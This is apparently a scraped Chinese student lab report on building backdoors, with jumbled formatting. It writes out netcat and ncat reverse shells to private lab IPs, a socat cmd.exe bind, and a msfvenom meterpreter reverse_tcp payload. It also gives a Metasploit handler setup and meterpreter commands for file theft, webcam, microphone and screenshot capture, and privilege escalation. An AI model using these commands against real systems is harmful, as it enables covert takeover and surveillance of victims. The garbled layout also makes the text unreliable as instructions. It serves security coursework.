标签:home str code amp inf 实施 剖析 用户 kali
后门工作流程:程序→植入→运行→免杀。
是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。
反向shell
ncat.exe -l -p 5324
。nc 192.168.44.130 -e /bin/sh
。linux shell
,可运行任何指令nc -l -p 5324
ncat.exe -e cmd.exe 192.168.44.128 5324
windows cmd
目的主机监听:
nc -l 监听端口 > 要接收的文件名
源主机发起请求:
nc 目的主机ip 目的端口
ncat -l 5324 > hcj.txt
开启监听。nc 192.168.44.130 5324 < hcj.txt
wget http://www.dest-unreach.org/socat/download/socat-1.7.0.1.tar.gz
tar -zxvf socat-1.7.0.1.tar.gz
cd socat-1.7.0.1
./configure --disable-fips
make && make install
tcp-listen:5324 exec:cmd.exe,pty,stderr
(作用是把cmd.exe绑定到端口5314,同时把cmd.exe的stderr重定向到stdout上),点击确定保存设置msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.44.128 LPORT=5324 -f exe > 20165324_backdoor.exe
输出到哪个文件
基于http方式的反向连接
在Kali Linux中输入msfconsole命令
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.211.55.10 //注意此处应为Linux的IP!
set LPORT 5314 //5314为端口号
show options
exploit
help
,查看meterpreter提供的命令及功能。help
给定的。
download +file path
:下载文件upload+ file path
:上传文件cat filename
:查看文件内容sysinfo
:显示远程主机的系统信息execute -f file
:执行一个命令,如execute -H -f otepad.exe
,参数-H表示隐藏,在后台执行。screenshot
:抓图webcam_snap
:拍照webcam_stream
:录像record_mic
:录音getsystem
:命令提权20165324 何春江 网络对抗技术 Exp:2 后门原理与实践
标签:home str code amp inf 实施 剖析 用户 kali
原文地址:https://www.cnblogs.com/20165324hcj/p/10567339.html